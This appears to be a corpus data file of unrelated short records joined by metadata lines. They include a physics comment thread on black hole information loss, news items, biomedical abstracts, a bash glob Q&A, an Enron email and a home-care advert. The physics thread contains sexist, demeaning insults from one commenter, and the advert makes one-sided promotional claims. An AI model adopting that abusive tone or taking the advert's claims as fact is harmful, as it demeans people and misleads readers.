to make sure we are talking about the same thing before we run into a misunderstanding?) you advocate religious questions instead of a proper rational analysis of measurable issues. Peter: "In your example, at large N the system will exhibit time irreversibilty to an excellent approximation (this is how our world looks after all)." In both examples (iron and black hole), irreversibility (and information loss) holds to an excellent approximation for large N. In other words, whenever one chooses a resolution of probes and accuracy that is less than perfect, information is getting lost and the evolution is irreversible. There is no qualitative difference between the two cases. The black hole example is not just analogous to the thermodynamic discussion: it is really a special case of it. I don't believe that Moshe disagrees with it because that would mean that he misunderstands basic thermodynamics, much like you do, and I see absolutely no reason to consider this hypothesis. Bee: I insist on every letter I wrote and you just help to confirm my point. Neither of your ideas about the black holes has anything whatsoever to do with the black holes in the real world, or any world that at least remotely resembles the real world, unlike black holes from Maldacena's papers that are always in the same universality class, to one extent or another. Lubos: I will try one last time to help you before I give up. Everyone agrees that a priori it is possible that the black hole information can come out in the radiation via small correlations that vanish in the infinite N limit. That by itself is fine, but the paradox is how to reconcile this with statements about an infalling observer carrying in information. Order by order in the 1/N expansion you will find that the observer travels in nicely, retaining his information. For very large but finite N this should then be true to excellent approximation. But if you believe in the usual rules of quantum mechanics the information cannot simultaneously be in the emitted radiation. The potential loophole here is that perhaps there is some subtle way in which this information really can be in "two places at once". That's called black hole complementarity, and is what Moshe is advocating. I really can't make it any simpler than that without the use of hand puppets. Peter, do you agree then that complementarity does not require you to modify known physics in regimes it should apply? I think that point is crucial to me, because like you I'd be suspicious of any proposal that suggests otherwise. Moshe: we'll have to first agree on what we mean by "in regimes it should apply". One might want to say that semi-classical results should hold whenever the curvature is low and one is asking sufficiently low energy question. But then one concludes that the infalling observer carries in information, and then the no xerox principle says it can't also be in the emitted radiation. Here I just assume that any information in the emitted radiation is in principle accessible to an external observer making low energy measurements, albeit with fantastic precision. Alternatively, one might argue that the above is too strong a requirement, since the observeability of the information duplication relies on some superobserver who can simultaneously see inside and outside the horizon. So maybe one should only trust physics in regimes that can be tested without reference to such a superobserver. I would personally say that this by itself constitutes a modification of known physics, but perhaps this is just semantics. In the above I am of course just summarizing the debates that went on regarding black hole complementarity in the early 90s. Great, I think we understand each other perfectly, we are down to semantics and personal belief. For me, references to unobservable quantities always raise a red flag, especially if there is an explicit confusion already on the table. I don't think this is the only context in physics for which such quantities (like that super-observer) get you very confused. So, my inclination is to regard that kind of mental discipline as nothing unconventional, just some good thinking habits, but that is just a matter of personal taste. Good, then I'm basically happy too. The true version of quantum mechanics/gravity may be such that it allows for information duplication as long as no one can actually observe this happening. I would just like to see this statement derived rather than asserted, as it is a bit vague to use as an axiom. And I'd like to know what are the precise conditions under which this information duplication can occur. Agreed, qualitative scenarios are nice but calculations speak louder. Now that we have a microscopic description of a situation containing quantum black holes, we can start putting meat on this particular scenario. I'd say this is getting more and more plausible, but we are still pretty far off from claiming it is an inevitable fact of life. In particular the viewpoint of the external observer is natural in ads/cft, but the infalling observer is more mysterious. (one minor point about the semantics, when two observers use different words to describe their partial knowledge of a single quantum state, duplication may be a misleading word to use). I'd like to thank "Peter" and Moshe for their extremely helpful exchange, which has made me realise that black hole complementarity is far from being as silly as the fuzzball stuff made me think. Moshe: you say about Horowitz-Maldacena: "Pope, I don't understand the M-H paper very well, maybe I'll invest some time trying to do that. It may well be the way things work for an in-falling observer. I am also not sure it necessarily contradict the complementarity picture." Yes, I see what you mean, and in fact H+M express a hope that something like this might come out of their work, though I don't understand exactly what they say about this [towards the end of the paper]. That would be wonderful if it could be done. I do hope that you will eventually have a posting about H+M on your blog... Peter Shor: Yes, the question as to the direction of time inside the black hole is crucial in H+M, but they explicitly deny that this will happen in their scenario; they devote a section of the paper to this very question. I think I will not try to paraphrase them... you might find this helpful: http://dabacon.org/pontiff/?p=1207 Lubos M: Your errors in this discussion apparently stem from your misunderstandings re the foundations of statistical mechanics. I suggest that you consult Peter, unlike Moshe, I don't see any partially rational reason that could be behind your extremely slow pace of understanding these simple things. Peter: "Order by order in the 1/N expansion you will find that the observer travels in nicely, retaining his information." Well, order by order in the 1/N (or "a", the atomic radius) expansion of the mechanics of 1 meter of iron, you will see that friction is slowing down its motion nicely, retaining the information about the initial state in exponentially decreasing degrees of freedom such as the relative velocity of two pieces of iron. Until the observer hits the singularity - or the friction stops the iron completely. There is absolutely no difference here. I deliberately constructed the examples to be isomorphic so only a mad person could oppose them. It is disappointing but not shocking that you oppose them anyway. Peter: "For very large but finite N this should then be true to excellent approximation. But if you believe in the usual rules of quantum mechanics the information cannot simultaneously be in the emitted radiation." This statement is equivalent to the statement that "quantum mechanics is incompatible with complementarity". Clearly, the statement is wrong. The degrees of freedom inside are explicitly functions of the degrees of freedom that one may imagine to be in the Hawking radiation only. For the iron case, there's still a perfect analogy. Two pieces of iron are crawling on top of one another. The relative velocity of these two places is like the quantities seen by the infalling observer - something that only makes sense in the thermodynamic limit. You could also say that it is a quantum xerox machine to say that these relative macroscopic velocities evolve deterministically, yet they are independently imprinted in the atomic description. And you would be equally wrong. There's no doubling of information here. The macroscopic velocities are simply some special functions of the atomic velocities. There is no double counting here. The only reason why the Hawking radiation could be banned from carrying the information is causality, but causality is only emergent in the strict infinite N case, i.e. in the 1/N expansions, but there's no exact causality in the exact finite N treatment. I am sorry that this discipline of science may be too difficult for girls who play with puppets, but maybe boys who play with trucks could already get it. Complementarity is fully compatible with the picture of difficult microstates - they're parts of the same framework. To decode the fuzzball inside the black hole, one must exactly know how it's connected to the exterior world near the horizon, i.e. one must know fine microscopic details about the Hawking radiation. For the rest of the nasty "Pope" crackpots here. I haven't made any error anywhere in this discussion, unlike the gadzillion of errors made (and still being made) by the likes of Peter. Lubos: you seem to be very interested in iron. That's nice. But we're actually discussing a different topic here. Moshe: It would be good if there were an actual concrete computation one could imagine doing to check the complementarity idea. In one way or another, you need to have two operators (one describing an observer and one measuring radiation) fail to commute even though they are spacelike separated by an arbitrarily large amount and live in a region of arbitrarily low curvature. Furthermore, the amount of non-commutingness has to be of order 1, even though it is zero order by order in the semi-classical expansion. Finally, this should only happen when one of the operators is inside an even horizon, or there is some other reason why no single observer can compare results of measurements made by these operators. Statements like "spacelike separated" undoubtedly become a bit fuzzy at the non-perturbative level, but the hard part is imagining that they get fuzzy enough when the curvature is arbitrarily low. I can at least imagine how one would try to check something like this in AdS/CFT. But with current understanding the situation is effectively reversed, as it's very hard in this context to derive the ordinary causal structure and ordinary notions of locality. Otherwise, as far as I know there is no direct evidence of this prediction of complementarity. The arguments in favor of complementarity are that it seems to be necessary if you demand that the info comes out in the radiation, and also that it doesn't lead to any obvious contradictions with the usual account of what an actual observer would measure. Peter, I agree with everything you write (also, thanks for nice discussion, it helped me clarify my thoughts). In particular the best evidence for complementarity is indeed the fact that it minimally incorporates all of known physics in regimes it applies (shall I call such approach conservative?). Something more concrete would be desirable, but we'd need to understand spacetime locality first. I have a feeling we are not that far off, because this time around we have a concrete model to discuss those things. We can calculate things and gather evidence, instead of arguing which proposal is more reasonable. (incidentally, I seem to have mixed my Peters once or twice above, sorry.) One minor point, about the commutator of the two operators: in semi-classical gravity all the questions you can ask give you ridiculously low amount of information (order one). So, the operators we have to discuss don't have a good semi-classical limit, and therefore you cannot say their commutator is zero in that limit. The fact that either observer is so incredibly oblivious to the real nature of what is going on in the system, makes the idea of complementarity more plausible, I think. So, the operators we have to discuss don't have a good semi-classical limit, and therefore you cannot say their commutator is zero in that limit. You lost me there. Assuming the outoging radiation does carry the information, this should be measurable by an external observer making low energy measurements (albeit very precisely). So there should be a semi-classical operator that describes this. Are you saying that you need to know quantum gravity in order to measure these subtle correlations (I would say that you need QG to compute what these correlations are, but not to measure them once they are there). I still don't understand how locality is violated in the fuzzball description. Seeing as how we must violate it at least weakly in order to avoid Hawkings argument and retain the nice picture of holography. Peter, in the semi-classical limit you are only able to gather order one number of bits. Trying to gather order S number of bits, any way you'd like it, you'd need more than the semi-classical treatment. I was assuming you are going to probe the system with very complicated operators to gather the required information. Alternatively you can also try to measure simple operators, but incredibly accurately. For getting this level of accuracy you'd need the small corrections provided by the full quantum gravity theory. Either way, if you probe the system using only semi-classical gravity, you get a very coarse grained picture. This is an important fact in this whole story. Peter, in the semi-classical limit you are only able to gather order one number of bits. Trying to gather order S number of bits, any way you'd like it, you'd need more than the semi-classical treatment. I don't see that. If you put a black hole in a box it will evaporate away into a gas of approximately thermal radiation whose entropy is of order the black hole entropy. Using semi-classical tools I can "easily" distinguish between essentially all the microstates of such a gas without needing to know about quantum gravity. Peter: presumably you'd measure some quantity, then calculate this quantity in semi-classical gravity for different states and use your measurement to distinguish the states. I'm saying that with any finite accuracy of measurement, and using only the semi-classical approximation for calculating properties of states, you will not be able to gather the required information to completely distinguish two generic states. For example, generically all states with the same quantum numbers are non-degenerate. So, accurate measurement of the energy at infinity ought to distinguish them. However, the energy spacing is of order e^(-S), so in the semi-classical limit any energy measurement with finite resolution will get contribution from huge number of states. completing the thought: even if you relax the requirement of finite energy resolution, and contemplate measuring energy to incredible accuracy, you'd still have to calculate the energy of states to that incredible accuracy in order to distinguish them. You cannot do that without the complete theory of QG. Moshe: I agree that measuring the precise energy is very hard. E.g. the level spacing for a 4D Schwarzschild BH goes as M e^{-M^2}, which is tiny. But also for gas in a box, while you could try to determine the microstate by carefully measuring the energy, this would be incredibly hard, but there are other far easier ways to do it. I'm arguing that if you could actually perform the experiment of collapsing matter into a black hole and letting it evaporate into a diffuse gas of radiation, a semi-classical observer could (by repeating the experiment enough times) thereby measure the S-matrix for this process. The hard part would be computing this S-matrix from first principles, but I don't see the obstacle to measuring it. Peter: I see the distinction you are making. I am talking about the calculation, not the actual measurement (though there could be interesting issues there as well, especially for the infalling observer that has finite lifetime). The description either observer gives to the system, using semi-classical GR variables, is a highly coarse grained one, that was my point. If both observers were describing the system in a language that was sensitive to all its fine structure, something like complementarity would be much harder to swallow. I wonder what's the problem with information and black holes?Information is related to entropy, and entropy certainly isn't constant of motion of system thermodynamically or quantum mechanically, only classic mechanically, in Newtonian mechanics, which is 'trivial' limit of quantum mechanics, clearly more realistic world. So why that 'paradox'?best, A. dS/dt>=0 , and so time reversibility of individual particles doesn't mean anything for a system of particles (an isolated system, say). Can you explain how is possible that classically information is lost , or are you saying that actually above form of 2.nd law is wrong, and it should be dS/dt=0 ? I think I have stated the problem as I see it multiple times in this tread and in the previous one on the information loss problem. It's that the evolution is not unitary, which clashes with our understanding of quantum mechanics. All that talk about entropy doesn't get you anywhere if you don't know for certain what the entropy of the object or its radiation is. Best, And so classically entropy increases , precisely because you include measurement in you model, and "if you wait long enough" you will only lose information, not gain it "from the sun", cause of repetitive measurement. Same with black holes.A. Haha, dear Stefan, it's funny you are trying to fish something to throw discussion on personal. And avoiding SCIENCE issues-. I believe I made my SCIENTIFIC point very clearly, and any decoy you are trying to pull is very, how should I say... unprofessional. I rest my case. very best,A.ps. although I find it very admirable your try to defend your spouse even when she is obviously wrong. But I believe it is more helpfull to set someone straight than to support wrong opinions of others when they are wrong. Gosh, I turn my back on this blog for 1 hour to run into a pharmacy and you guys get in a fight over nothing. First, A., I don't know which 'case' you think you have made, but it is none. I'm talking CLASSICALLY, the only way ENTROPY is defined. I hope you know CLASSICALLY what entropy is, do you? It might have escaped your attention but CLASSICALLY there is no information loss problem, case rested. Besides this, Googling would have been sufficient to find that entropy also can be defined in quantum mechanics. It has the property that it remains invariant under unitary transformations, meaning in particular pure states evolve into pure states. To reiterate what I said above, the problem is that the evolution of black holes is seemingly not unitary (without measurement), in conflict with quantum mechanics as we know and like it. Besides this, I think you suffer from a confusion about the case with dS>0. It does not mean the time-reversed evolution of a state with increased entropy does not exist, it means this time-reversed evolution is extremely unlikely to happen. I think this should explain my example with the sun. Whether getting that information is in practice feasible is a different issue. However, as I have also said several times above, you might not be bothered that after measurement evolution is indeed non-unitary, but you should be bothered if prior to measurement it is, because it has unwanted side effects, such as violation of energy conservation that can in principle be arbitrarily large. As I said, you can try to play around with accepting some form of non-unitarity that might keep these side-effects small, there are people who are taking this path. As to Stefan's comment, his and my exasperation with comments like yours is that they are completely unconstructive and merely show you have neither tried to follow the line of thought in my writing, nor my previous explanations in earlier comments. It is thus merely a waste of our time. I hope you understand that. Rest assured, it's nothing personal. Take an arbitrary initial quantum state with total mass M. Let it collapse to a black hole. Let it evaporate. If Hawking's calculation holds, the emitted radiation depends solely on the mass (angular momentum, charge) of the collapsed matter. If it evaporates that way completely, the endstate is always the same for all initial states with the same mass. Thus, starting from the endstate you can not reconstruct the initial state. Evolution is not reversible, meaning it can't be unitary. (This is written in various forms in this post, in the earlier post, and in the paper.) You can then allow for deviations from the semi-classical limit in the Planckian regime, it follows the usual argument, see paper. Best, Sorry, comments crossed. In the case of throwing something into the sun, you can 'in principle' reconstruct the initial from the final state before reduction through measurment (in which case you have the usual problem that this process is non-deterministic). Best, “So if Hawking calculation holds we have a problem, and if don't we don't have a problem.” Sorry for interjecting yet there is another possibility, although considered by most remote, and that is to consider that neither black hole singularities or event horizons don’t exist to begin with. That is GR is not quite right. Recently I finished reading John Moffat’s book “Reinventing Gravity”m where he submits that his latest Modified Gravity Theory (MOG) predicts this. In this theory massive stars and super massive bodies at the centre of galaxies would form a final compact state he calls grey stars, where light (EM) is so bent that it has a hard time escaping, although a lesser amount does. Unfortunately he doesn’t say how much greater in diameter it would be above the Schwarzschild radius radius, yet I know that a photosphere in a non rotating black hole extends 1.5 time the distance. For rotating ones there are two. I suspect then the calculated minimum radius is somewhere between the two. So there is some possibility that while Hawking’s calculations are correct but the model he uses foe gravity could be simply wrong. This is not to say that I understand Moffat’s theory to be true yet, he has given ways it can be tested and thus falsified which seems more difficult using the more normal considerations. So if Hawking calculation holds we have a problem, and if don't we don't have a problem. Do you think this problem is big enough to vote against HAwking calculation? That's not the point. The point is to understand exactly why and where it fails and to get the correct answer. Bee: listen, HAwking equations are semiclassical, meaning they very much include MEASUREMENT in them. Meaning no problem there. You can't have your argument for quantum unitarity be based on semiclassical calculation, got it? [...] My point then is that every semiclassical model includes measurement in it, meaning irreversibility is expected and it would be strange if there were not time-ireversibility What is classical is the background field, and it is so to excellent approximation, the more massive the black hole, the better. What one computes is the propagation of a quantum field in this background. Its propagation should be reversible unless you perform a measurement on it, which you don't have to. If this is too complicated, think of it in terms of a scattering matrix, which I find more intuitive. You have an almost flat space in the beginning with some quantum states. They approach each other (form a black hole and evaporate) and you have outgoing quantum states. What are the transition amplitudes? Is this evolution unitary? Besides this, let me repeat that the non-unitarity you generically get if you accept what you advocate can have unwanted side effects such as violations of energy conservation. Be careful what you wish for. You could easily clarify your confusion if you'd look up any of the literature on the subject. Well, I didn't read the book, but let me say that as much as I like John it doesn't make sense to me. See (as I said several times in this post and in earlier posts) a black hole horizon can form at arbitrarily small background curvature. GR is an extremely well tested theory in the weak curvature regime. If you want to generally avoid black hole formation you need to have significant modifications of the theory in regimes that we have well tested. I don't know how John envisions a solution to this, but I am pretty sure you'll have to bend your mind around quite a bit for this. Sorry for being so 'conservative' ;-p Maybe you could clarify your confusion if you think about what you read. I don't advocate nonunitarity, what I'm saying is that Hawking calculations are practically classical, meaning unitarity or nonunitarity is not an issue, since that term belongs to quantum domain. Background field is classical, meaning it includes measurement, meaning you cant say it is so "to an excellent approximation". It is or it isn't. Measurement disrupts everything, in a rather DISCONTINUOUS way. And so it is not "to an excellent approximation", but to a catasrtophic approximation. As I have said above, the point is not to draw a picture with crayons, but to come up with a calculation that shows exactly when and where Hawkings calculation goes wrong and what the correct result is. Your argument is fundamentally flawed, you could equally well say that no process in our labs is ever unitary, because hey, we treat the background as classical. Yet, treating the background as classical is indeed, as I said, an excellent approximation - as long as quantum fluctuations of the background are negligible. Best, I understand what you are saying, but you don't understand my answer. I am very sympathetic to the idea that the graviational field carries degrees of freedom that are relevant to the propagation and survival of information, but stating that alone doesn't solve the problem. To show that it does, you'll need to know how the quantum degrees of freedom are encoded in the quantum background, and that all the information from the initial quantum field (including the matter field) is contained also in the final state. You need to do that without causing strong deviations from the theories that we know and like which work perfectly well if the background is to good approximation classical - which is the essential ingredient to Hawking's result. You can put some quantum hair on the horizon if you like, as far as I know these attempts didn't go very far. If you claim that quantum effects of gravity are non-negligible, and relevant for the outgoing radiation, let me ask you once again: how so. And if you have solved the problem, why don't you go and publish a paper about it instead of wasting my time with your crayon drawings? Best,
null
minipile
NaturalLanguage
mit
null
Lebanon’s prime minister announced his resignation Tuesday following nationwide protests that have paralyzed the country for nearly two weeks. In a televised announcement, PM Saad Hariri stated that he was stepping down amid his country’s anti-government demonstrations, relinquishing political power to Lebanon President Michel Aoun. LEBANON PARALYZED BY NATIONWIDE PROTESTS OVER PROPOSED TAXES “It has become necessary for us to make a great shock to fix the crisis,” Hariri said. “Our responsibility today is how we protect Lebanon and revive its economy.” The move comes only hours after a mob of supporters from the Hezbollah party attacked anti-government protest camps in the country’s capital of Beirut. THOUSANDS OF LEBANON DEMONSTRATORS KEEP PRESSURE ON GOVERNMENT What began on Oct. 17 as a fight over a tax on Whatsapp calls has now erupted into “a war scene,” according to a local TV presenter. The predominately non-violent demonstrations were disrupted by the Shia-Islamist group who are upset that their country is being paralyzed politically and economically. Soldiers and riot police have been trying to separate the two groups using non-deadly force, but have been unsuccessful. Hezbollah leader, Sayyed Hassan Nasrallah, stated Friday that the roads around Beirut's center should be reopened and hinted that the protestors were being funded by foreign enemies attempting to infiltrate their agendas. “Someone is trying to pull it… toward a civil war,” Nasrallah said Friday about the country’s uprisings. Hezbollah, the country’s most powerful armed group, backs a majority of the Lebanese government since its formation following the 1975-1990 civil war. They are represented by Parliament Speaker and Shia Muslim Nabih Berri, who traditionally splits up political leadership equally with a prime minister representing Sunni Muslims and a president representing Maronite Christians. Berri has been called to resign over his involvement in an ineffective government and economic system. “We just want to say that this is the first of many,” a protester told The Guardian after Hariri’s resignation. “We’re waiting for the others to show some dignity. But I doubt they have it.” With the banks closed for the tenth day in a row, many political operatives argue that the protesting is only hurting their cause. CLICK HERE FOR THE FOX NEWS APP “Even if the protesters leave the streets, the real problem facing them is what they are going to do with the devaluation of the pound,” a Lebanese economist, Toufic Gaspard, told Reuters. The Associated Press contributed to this report.
null
minipile
NaturalLanguage
mit
null
According to the report, the company is researching ways in which DNA can arrange itself into patterns on the surface of a chip, and then act as a kind of scaffolding on to which millions of tiny carbon nanotubes and nanoparticles are deposited. That network of nanotubes and nanoparticles could act as the wires and transistors on future computer chips. Amazing, isnt it? If your futuristic phones chip could be made up of DNA, your mobile phone as well might be made up of your own DNA. Furthermore, that will become your unique identity number and you might even have the phone embedded in your body.
null
minipile
NaturalLanguage
mit
null
maple syrup Pick up some Maple Syrup and Carrots at the market and you’ve got a crowd pleasing side dish for your Thanksgiving Day table and beyond. For more great farmers market inspired recipes visit: LocalSavour.com
null
minipile
NaturalLanguage
mit
null
Libs-Nats have ‘cut and shut’ regional rail LETTER TO THE EDITOR: Minister: It's hard to trust the Liberals and Nationals rail announcement, going by the history books. LETTER TO THE EDITOR: IT’S hard to trust the Liberals and Nationals rail announcement, going by the history books. They have no credibility when it comes to regional rail. All they’ve done is cut and shut. When last in government they didn’t order a single new carriage for two years, didn’t start a rail project anywhere and ripped $120 million out of V/Line — and it was a Liberal-National government that shut regional rail lines. We’ve stopped the cuts, restored the funding to V/Line, ordered 87 new regional carriages and already begun the design work needed to run VLocity carriages on long haul lines. We’ve added 600 services to the regional network and additional VLocity carriages to services that need it most. These carriages, built in Victoria, reduce crowding on the busiest services and allow more trains to run more often, and we’ve invested in the design work necessary to replace the classic feet with modern trains. If the Coalition wants to do something useful for V/Line users, it should pick up the phone to Malcolm Turnbull and tell him to release the money he has promised for Regional Rail Revival so we can get on with upgrading every regional line, and run modern trains across the state.
null
minipile
NaturalLanguage
mit
null
Today we received the first official poster for “Star Trek Into Darkness,” the sequel of the remake of “Star Trek” from director J.J. Abrams. From what we can see, there is a human figure on top of a stone rubble from a collapsed building or a derelict spaceship into a city. The official plot of “Star Trek Into Darkness” is the following: In Summer 2013, pioneering director J.J. Abrams will deliver an explosive action thriller that takes Star Trek Into Darkness. When the crew of the Enterprise is called back home, they find an unstoppable force of terror from within their own organization has detonated the fleet and everything it stands for, leaving our world in a state of crisis. With a personal score to settle, Captain Kirk leads a manhunt to a war-zone world to capture a one man weapon of mass destruction. As our heroes are propelled into an epic chess game of life and death, love will be challenged, friendships will be torn apart, and sacrifices must be made for the only family Kirk has left: his crew. The premiere of the first trailer is scheduled for this month of December, and is said to be seen preceding the screening of “The Hobbit: An Unexpected Journey“. “Star Trek Into Darkness” will be released on May 17, 2013 in the United States and will star John Cho, Bruce Greenwood, Simon Pegg, Chris Pine, Zachary Quinto, Zoe Saldana, Karl Urban, Anton Yelchin, Benedict Cumberbatch, Alice Eve and Peter Weller.
null
minipile
NaturalLanguage
mit
null
A diet enriched in linoleic acid compromises the cryotolerance of embryos from superovulated beef heifers. Dietary rumen-protected fat rich in linoleic acid may affect the superovulatory response and embryo yield; however, its effects on in vivo embryo cryotolerance are unknown in zebu cattle. The present study evaluated the production and cryotolerance after freezing or vitrification of embryos from Nelore heifers supplemented with rumen-protected polyunsaturated fatty acids (PUFA). Forty heifers kept in pasture were randomly distributed into two groups according to the type of feed supplement (F, supplement with rumen-protected PUFA, predominantly linoleic; C, control fat-free supplement with additional corn). Supplements were formulated to be isocaloric and isonitrogenous. Each heifer underwent both treatments in a crossover design with 70 days between replicates. After 50 days feeding, heifers were superovulated. Embryos were evaluated morphologically and vitrified or frozen. After thawing or warming, embryo development was evaluated in vitro. There was no difference between the F and C groups (P>0.10) in terms of embryo production. Regardless of the cryopreservation method used, Group C embryos had a greater hatching rate after 72h in vitro culture than Group F embryos (44.3±4.2% (n=148) vs 30.9±4.0% (n=137), respectively; P=0.04). Moreover, vitrified and frozen embryos had similar hatching rates (P>0.10). In conclusion, dietary rumen-protected PUFA rich in linoleic acid did not improve embryo production and compromised the cryotolerance of conventionally frozen or vitrified embryos from Nelore heifers.
null
minipile
NaturalLanguage
mit
null
IL-1 cytokines in cardiovascular disease: diagnostic, prognostic and therapeutic implications. Interleukins (ILs) are key mediators in the chronic vascular inflammatory response underlying several aspects of cardiovascular disease. Due to their powerful pro-inflammatory potential, and the fact that they are highly expressed by almost all cell types actively implicated in atherosclerosis, members of the IL-1 cytokine family were the first to be investigated in the field of vessel wall inflammation. The IL-1 family is comprised of five proteins that share considerable sequence homology: IL-1alpha, IL-1beta, IL-1 receptor antagonist (IL-1Ra), IL-18 (also known as IFNgamma-inducing factor), and the newly discovered ligand of the ST2L receptor, IL-33. Expression of IL-1s and their receptors has been demonstrated in atheromatous tissue, and serum levels of IL-1-cytokines have been correlated with various aspects of cardiovascular disease and their outcome. In vitro studies have confirmed pro-atherogenic properties of IL-1alpha, IL-1beta and IL-18 such as, up-regulation of endothelial adhesion molecules, the activation of macrophages and smooth muscle cell proliferation. In contrast with this, IL-1Ra, a natural antagonist of IL-1, possesses anti-inflammatory properties, mainly through the endogenous inhibition of IL-1 signaling. IL-33 was identified as a functional ligand of the, till recently, orphan receptor, ST2L. IL-33/ST2L signaling has been reported as a mechanically activated, cardioprotective paracrine system triggered by myocardial overload. As the roles of individual members of the IL-1 family are being revealed, novel therapies aimed at the modulation of interleukin function in several aspects of cardiovascular disease, are being proposed. Several approaches have produced promising results. However, none of these approaches has yet been applied in clinical practice.
null
minipile
NaturalLanguage
mit
null
Enter your email to subscribe: Republican Senate Candidate Christine O'Donnell's 2008 primary campaign manager Jonathon Moseley this week offered a $1,000.00 reward to anyone who could find the phrase "separation of church and state" in the Constitution. (Thanks to Carrie Beth Clark for the tip.) The offer comes on the heels of O'Donnell's statement in her debate last week with Democrat Chris Coons that the First Amendment contains no such phrase and requires no such separation. The phrase, of course, comes from Thomas Jefferson's January 1, 1802, letter to the Danbury Baptist Association in response to that group's address congratulating him on his election as president. The Library of Congress, with the help of the FBI, analyzed Jefferson's handwritten draft of the letter, including Jefferson's edits, and featured the letter in a 1998 exhibit on church and state. The LoC gives us an historical context here. The text of Jefferson's final letter is here; the unedited text is here. From the LoC: Jefferson revealed that he hoped to accomplish two things by replying to the Danbury Baptists. One was to issue a "condemnation of the alliance between church and state." This he accomplished in the first, printed, part of the draft. Jefferson's strictures on church-state entanglement were little more than rewarmed phrases and ideas from his Statutes Establishing Religious Freedom (1786) and from other, similar statements. To needle his political opponents, Jefferson paraphrased a passage, that "the legitimate powers of government extent to . . . acts only" and not to opinions, from the Notes on the State of Virginia, which the Federalists had shamelessly distorted in the election of 1800 in an effort to stigmatize him as an atheist. So politicized had church-state issues become by 1802 that Jefferson . . . considered the articulation of his views on the subject, in messages like the Danbury Baptist letter, as ways to fix his supporters' "political tenets." Here's what Moseley had to say: Jefferson was not in the Constitutional Convention that wrote the U.S. Constitution. . . . Jefferson was also not a member of the first U.S. Congress that wrote the Bill of Rights, either. . . . The law clerks over in the U.S. Supreme Court should stop reading people's letters and re-read the U.S. Constitution itself.
null
minipile
NaturalLanguage
mit
null
Joan Rivers' Doc Snapped a Selfie While She Was Under Anesthesia: Report Joan Rivers' personal doctor took a selfie while the comedian was under anesthesia and performed an unplanned biopsy on her after a New York City clinic medical director finished his scheduled endoscopy on the 81-year-old, a source told CNN this week. Yorkville Endoscopy has denied that a biopsy of Rivers' vocal cords was performed at the clinic but declined to release any further information because of federal privacy laws. Yorkville also told CNN that the doctor who performed the original endoscopy, Dr. Lawrence Cohen, was no longer serving as medical director there or doing medical procedures. Joan Rivers' personal doctor took a selfie while the comedian was under anesthesia and performed an unplanned biopsy on her after a New York City clinic medical director finished his scheduled endoscopy on the 81-year-old, a source told CNN this week.
null
minipile
NaturalLanguage
mit
null
James H. Anderson (politician) James Hall Anderson (November 12, 1878 – 1936) was an American politician who served as the seventh Lieutenant Governor of Delaware, from January 20, 1925, to January 15, 1929, under Governor Robert P. Robinson. External links Delaware's Lieutenant Governors Category:Lieutenant Governors of Delaware Category:1878 births Category:1936 deaths
null
minipile
NaturalLanguage
mit
null
Q: Recursive glob? I'd like to write something like this: $ ls **.py in order to get all .py filenames, recursively walking a directory hierarchy. Even if there are .py files to find, the shell (bash) gives this output: ls: cannot access **.py: No such file or directory Any way to do what I want? EDIT: I'd like to specify that I'm not interested in the specific case of ls, but the question is about the glob syntax. A: In order to do recursive globs in bash, you need the globstar feature from bash version 4 or higher. From the bash manpage: globstar If set, the pattern ** used in a pathname expansion context will match all files and zero or more directories and subdirectories. If the pattern is followed by a /, only directories and subdirectories match. For your example pattern: shopt -s globstar ls **/*.py A: find . -name '*.py' ** doesn't do anything more than a single *, both operate in the current directory A: Since Bash 4 (also including zsh) a new globbing option (globstar) has been added which treats the pattern ** differently when it's set. It is matching the wildcard pattern and returning the file and directory names that match then by replacing the wildcard pattern in the command with the matched items. Normally when you use **, it works similar to *, but it's recurses all the directories recursively (like a loop). To see if it's enabled, check it by shopt globstar (in scripting, use shopt -q globstar). The example **.py would work only for the current directory, as it doesn't return list of directories which can be recurses, so that's why you need to use multiple directory-level wildcard **/*.py, so it can go deeper. Please find on SO few syntax tests which I did for finding all the files recursively.
null
minipile
NaturalLanguage
mit
null
Kathy: Please issue a guest user id to Bob Lawrence at Milbank Tweed Hadley & McCloy. Bob is a lawyer helping us with various EnronOnline matters including Broker Connect. His e-mail address is [email protected]. Thanks, Mark
null
minipile
NaturalLanguage
mit
null
As we all know, home is the place of emotional, physical association, memories, and comfort. The hospital is the place for primary care for the people suffering from chronic illness and acute issues. Many people feel upsetting while leaving their home. What can be the solution for this? Asks Gary Ferone who is the franchise owner of Assisting Hand in Stamford, Connecticut. The only solution for this kind of people is to visit home health care. Home health care is the fastest growing segment and they provide a variety of different home health care services for seniors including helping the patients with daily needs. Is home health care really better than hospital care? The immediate answer is yes and it comes with the 5 reasons of why it is better than hospital care. By receiving home health care services, patients can enjoy the personal care in the comfort of their own homes and in the presence of their loved ones. Home health care help and support the family members, allowing them to enjoy quality time with their elderly loved ones. Home health care is recognized as the most cost-effective form of long-term health care when compared to hospitals. By having good quality nursing care at home, re-hospitalization gets reduced. In many cases, patients used to return to the hospital soon after their previous stay and this may be costly and potentially harmful. Hence, this can be avoided with home health care services. Apart from all these facilities, family members, and friends can visit the patients anytime they wish while compared to time-based visiting hours in the hospital. Are you finding it difficult to look after your parents due to the busy schedule of everyday life? You are one of the majorities facing the same problem to take good care of the elderly family members because of the heavy workload of professional sectors. You do not have the option to stay at home in order to monitor your parents’ health, but you cannot even entirely concentrate on your works. If that is what describes you, the situation has to come to the end. If one of your parents is handicapped or physically disabled, the situation might have got worst for you. So, how to take care of your elderly family members and concentrate on your professional life at the same time? Are you aware of the concept of healthcare for handicapped people? No? You are missing out the great solution. Go for one who is an expert when it comes to communicating with the elder person. Well-skilled healthcare professionals are great at coordinating with the patients. Good communication skill is the key to success. Look for one who is calm and collected: The ability to remain calm and cool, headed in every situation is a must when it comes to handling elderly or handicapped persons. Usually, these kinds of individuals are more likely to lose their self-esteem. They might be the victim of chronic depression and mood swings. A health care executive needs to balance every situation with utmost perfection and care. The Assisting Hands Home Care, operated by Gary Ferone, has been providing the individuals of Stamford with a very good home care services for a very long time. You never compromise with the safety of your family members, right ? So, what do you do when it comes to take care of any loving elderly person of your home? It might be one of your parents or anyone else who always holds your concerns and care. It is quite natural that you hardly get the time to look after the loved ones due to your busy schedule. So, how to solve the situation? Have you ever wondered about the effectiveness of the home health care solutions out there? Yeah, probably you are aware of the services right? Thgen why not opt for one? What is a healthcare service by the way? In case, if you are wondering, read on to know more. Lots of emotional and physical changes take place with passing time, especially while getting older. A proper healthcare solution can help you look after the elderly family members on a daily basis or periodically during the week. Sounds quite satisfactory right? Do not delay to hire a great service provider of health care for elders at home. Are you wondering who would be the best home care service provider to opt for? Assisting Hands Home Care is here to solve all your problems. This organization is known to be a health care agency for the elderly 